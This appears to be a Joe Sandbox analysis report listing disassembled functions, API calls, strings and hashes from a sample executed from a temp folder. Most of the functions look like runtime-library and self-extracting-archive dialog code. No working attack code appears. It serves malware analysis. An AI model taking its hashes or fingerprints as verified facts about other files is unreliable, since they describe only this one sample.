WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B8D11C

Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B8D142
_free.LIBCMT ref: 00B8D155
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B8D164

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 08dd09984febf1c37398a3647f5a32f73a2bf4855a4215bca14f8f4a69dd1684
Instruction ID: fd2fc1c58a93bae261ac496dd8d096d45b6f1e3dad126ed79c6c04c897461f82
Opcode Fuzzy Hash: 08dd09984febf1c37398a3647f5a32f73a2bf4855a4215bca14f8f4a69dd1684
Instruction Fuzzy Hash: 8C0152626012257F272176A66C8CC7B6BBDEEC6BA0315016BB908E7260EE648C02C271

Function 00B8A599 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B8A7F0,00B8C348,?,00B8A543,00000001,00000364,?,00B853FD,?,?,00BA30C4), ref: 00B8A59E
_free.LIBCMT ref: 00B8A5D3
_free.LIBCMT ref: 00B8A5FA
SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A607
SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A610

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 997f5067c9b4d1f77208d1184b8d63e397eefc97c43234229e9e43f3cb09b2c0
Instruction ID: 31b5ef41c723e7a0b2326bd88296d9daab9c6532579041355ac59ed9714f73e7
Opcode Fuzzy Hash: 997f5067c9b4d1f77208d1184b8d63e397eefc97c43234229e9e43f3cb09b2c0
Instruction Fuzzy Hash: 3C01F476144600A7B21237646D86D6B3AEADBD27B172900ABF905A31B2FF708D42D366

Function 00B7220D Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00B724EF: ResetEvent.KERNEL32(?), ref: 00B72501
Part of subcall function 00B724EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B72515

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B72241
CloseHandle.KERNEL32(?,?), ref: 00B7225B
DeleteCriticalSection.KERNEL32(?), ref: 00B72274
CloseHandle.KERNEL32(?), ref: 00B72280
CloseHandle.KERNEL32(?), ref: 00B7228C

Part of subcall function 00B72303: WaitForSingleObject.KERNEL32(?,000000FF,00B72420,?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72309
Part of subcall function 00B72303: GetLastError.KERNEL32(?,?,00B7249F,?,?,?,?,?,00B72489), ref: 00B72315

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 39ad31f7887d89d31d99ee5af246ec5fc8f437abc24ae696c035a90cce763fad
Instruction ID: 92788bf63210e1172637bf0151204881597291c19a8dbf256734d3306897cb10
Opcode Fuzzy Hash: 39ad31f7887d89d31d99ee5af246ec5fc8f437abc24ae696c035a90cce763fad
Instruction Fuzzy Hash: 46017172400704EFC7229B64DE85FC6BBE9FB08710F01896AF26B92160CB756A56CB54

Function 00B8D9BF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B8D9D7

Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692

_free.LIBCMT ref: 00B8D9E9
_free.LIBCMT ref: 00B8D9FB
_free.LIBCMT ref: 00B8DA0D
_free.LIBCMT ref: 00B8DA1F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c2a9f89594f43a752086267bf131359f8d20ae8901f31840126af9d741c2523c
Instruction ID: ff4d886493fae46883df1f51d7b6aafcd03942322d7c917378534078843fc84b
Opcode Fuzzy Hash: c2a9f89594f43a752086267bf131359f8d20ae8901f31840126af9d741c2523c
Instruction Fuzzy Hash: E0F0FF72914200EB9624FB64E586C1A73E9FB05B11B680C8BF04CD75A5DA71FC80D754

Function 00B73338 Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B73340
_wcslen.LIBCMT ref: 00B73351
_wcslen.LIBCMT ref: 00B73361
_wcslen.LIBCMT ref: 00B7336F
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B6C844,?,?,00000000,?,?,?), ref: 00B7338A

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: ad21d680031fecb6c4ee603097ff438c15291f9c23f654369030d1206b5ef045
Instruction ID: 3664918ce9db5b7f1d9c41ea45ae7a9a1f730bf0176e9330ce7f3ec8547908a4
Opcode Fuzzy Hash: ad21d680031fecb6c4ee603097ff438c15291f9c23f654369030d1206b5ef045
Instruction Fuzzy Hash: 50F01D32008115BBCF226F61DC09CCE3FA6EB94B64B128056F62D5A061CF329665D794

Function 00B89CD0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B89CEE

Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692

_free.LIBCMT ref: 00B89D00
_free.LIBCMT ref: 00B89D13
_free.LIBCMT ref: 00B89D24
_free.LIBCMT ref: 00B89D35

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 202c20cdf0b6c1921d81f2ed482e5ab400eac90d056e1473f02f695b941434df
Instruction ID: 16d8fac492324e18a1a615c48c7cfe3e6f96ae6655b1932f39886c5e7f4baa8b
Opcode Fuzzy Hash: 202c20cdf0b6c1921d81f2ed482e5ab400eac90d056e1473f02f695b941434df
Instruction Fuzzy Hash: 3AF0DA718251209BDA01BF14FC53C197BF1F72BB21709068BF41A57275EFB20A51DB85

Function 00B72948 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B72B06
_swprintf.LIBCMT ref: 00B72BB5

Strings

%s: %s, xrefs: 00B72B15
%ls, xrefs: 00B7298B, 00B729A1

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 8f9a44a0460cc5b67b733ba20e5b8738241707ca536f26081eebd673a02997ec
Instruction ID: 6ec0df559b603da915a8426b332298729802821ea423ef172c050ff5637bf6f1
Opcode Fuzzy Hash: 8f9a44a0460cc5b67b733ba20e5b8738241707ca536f26081eebd673a02997ec
Instruction Fuzzy Hash: B751D136688301FEEA211B948C82F3676E4EF14B01F28C5E6B7BF641E5CAA19550A717

Function 00B89330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\4.exe,00000104), ref: 00B89370
_free.LIBCMT ref: 00B8943B
_free.LIBCMT ref: 00B89445

Strings

C:\Users\user\AppData\Local\Temp\4.exe, xrefs: 00B89367, 00B8936E, 00B8939D, 00B893D5

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\4.exe
API String ID: 2506810119-1708109389
Opcode ID: c163a6fce1cb565d9d0ba4120ad5c9aca0ced882f9039434d1b331441d84b548
Instruction ID: 1eb273553e37ade6d722d4aa2a63daf5a5b3f2af339cc5f8faf03a89debb04a4
Opcode Fuzzy Hash: c163a6fce1cb565d9d0ba4120ad5c9aca0ced882f9039434d1b331441d84b548
Instruction Fuzzy Hash: 2B316F71A04258EFDF21EF99D885DAEBBF8EB89710B1840E6F50497261D7708E41CB91

Function 00B84366 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B8438B
_abort.LIBCMT ref: 00B84496

Strings

MOC, xrefs: 00B8439D
RCC, xrefs: 00B843A5

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 4af8af374d904f605947357a1e3ce8eeb8e669565e941603cd90a1193d992899
Instruction ID: ec66b3a8e1198d05bce232238f3da3055afca76acb97d77597a7a9309954c9ec
Opcode Fuzzy Hash: 4af8af374d904f605947357a1e3ce8eeb8e669565e941603cd90a1193d992899
Instruction Fuzzy Hash: AF41487190020AEFDF15EF98DD81AAEBBF5FF48304F1880A9FA04A7221D7359961DB50

Function 00B67F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B67F20

Part of subcall function 00B642F1: __EH_prolog.LIBCMT ref: 00B642F6

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B67FE5

Part of subcall function 00B68704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B68713
Part of subcall function 00B68704: GetLastError.KERNEL32 ref: 00B68759
Part of subcall function 00B68704: CloseHandle.KERNEL32(?), ref: 00B68768

Strings

SeRestorePrivilege, xrefs: 00B67F77
SeSecurityPrivilege, xrefs: 00B67F62

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: d3611116ad4dea8ecaaf4613f3389dd214f48d46c3a6108af830331dede2cb13
Instruction ID: 997b7017987ef932f691290a4015b158db87b057db1f54a3038e0fe27f8dcbb9
Opcode Fuzzy Hash: d3611116ad4dea8ecaaf4613f3389dd214f48d46c3a6108af830331dede2cb13
Instruction Fuzzy Hash: 3F31E071940244AEEF31EBA49C06FFE7BE9EB05718F0040A5F448A7191DFB88D84DBA1

Function 00B7BDE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

EndDialog.USER32(?,00000001), ref: 00B7BE68
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B7BE7D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00B7BE92

Strings

ASKNEXTVOL, xrefs: 00B7BDF8

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: b390055b87edf7440ed14837ced37cbd9aef30c23bb0cb021568b4bf646a280a
Instruction ID: 2526dd2354a23c6290748905af8145bf0078572d34dd4f02709d9962e74c8440
Opcode Fuzzy Hash: b390055b87edf7440ed14837ced37cbd9aef30c23bb0cb021568b4bf646a280a
Instruction Fuzzy Hash: 8311B432600211BFD7119F68DC49FAB37E9EB4EB40F048894F754E72B4CB6299058B65

Function 00B6EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00B6EC74
_strncpy.LIBCMT ref: 00B6ECBA

Part of subcall function 00B730F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BA3070,?,00B6EC48,00000000,?,00000050,00BA3070), ref: 00B73112

Strings

$%s, xrefs: 00B6EC69
@%s, xrefs: 00B6EC5E

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 6305cc5111ec6656716e7c39b516ac876ea208d7d9fee2e5f2d3b62ea29dfb6d
Instruction ID: 79d94530cab762ce330e4e8d63946a4fc221d3eebcbe01e25a3112b9ea92bd32
Opcode Fuzzy Hash: 6305cc5111ec6656716e7c39b516ac876ea208d7d9fee2e5f2d3b62ea29dfb6d
Instruction Fuzzy Hash: 8921AF76440308AEEF20EEA4CE42FEF3BE8EF05700F1405A2F925961A1E779D644CB61

Function 00B72166 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B6C04A,00000008,?,00000000,?,00B6E685,?,00000000), ref: 00B721A5
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B6C04A,00000008,?,00000000,?,00B6E685,?,00000000), ref: 00B721AF
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B6C04A,00000008,?,00000000,?,00B6E685,?,00000000), ref: 00B721BF

Strings

Thread pool initialization failed., xrefs: 00B721D7

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: f48ae58934cd21ebc94cfc088bb8636f2a507a8a4f044871f51892911281d1e9
Instruction ID: 38c0b860294644fea669b21a751687868e7ea1a1b7143af47444d57e79ac9b61
Opcode Fuzzy Hash: f48ae58934cd21ebc94cfc088bb8636f2a507a8a4f044871f51892911281d1e9
Instruction Fuzzy Hash: 7711CEB1604709AFC3214F6ADC84AA7FBECFB55358F50886EF2EAD3200DA7059408B60

Function 00B7C460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350

EndDialog.USER32(?,00000001), ref: 00B7C4AE
GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00B7C4C6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00B7C4F4

Strings

GETPASSWORD1, xrefs: 00B7C479

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 797ed91aecb2ca91b523bab767760fad776ea0c40839b0ec978768dc86accffa
Instruction ID: 72c2e061487d5f4097bdd776b86000939e86e33de0ff4367cb1cc9c351d7bb50
Opcode Fuzzy Hash: 797ed91aecb2ca91b523bab767760fad776ea0c40839b0ec978768dc86accffa
Instruction Fuzzy Hash: A011C872600118BADB205A649C99FFB3BACEB49714F0484ADFB1DF6180C674AD429664

Function 00B7EE2D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00B7EE6C, 00B7EEA0
RENAMEDLG, xrefs: 00B7EE81

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 64496ce93b2bcf6a3a3406b65bc70e7e95d7c3d0dd9c5ac844717117a482671b
Instruction ID: 1b1e563c8ade6f03b78be3cd443f38b3f92de27b491cdedd4692ba079c86a346
Opcode Fuzzy Hash: 64496ce93b2bcf6a3a3406b65bc70e7e95d7c3d0dd9c5ac844717117a482671b
Instruction Fuzzy Hash: FB015271504244ABDB615F18EC89E573BE4EB0D794B0044A5F529D3270DB71E890DBA1

Function 00B64957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B6495C

Part of subcall function 00B7FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B7FD29
Part of subcall function 00B7FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 00B7FD4F

std::_Xinvalid_argument.LIBCPMT ref: 00B64967

Strings

string too long, xrefs: 00B64957
vector too long, xrefs: 00B64962

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
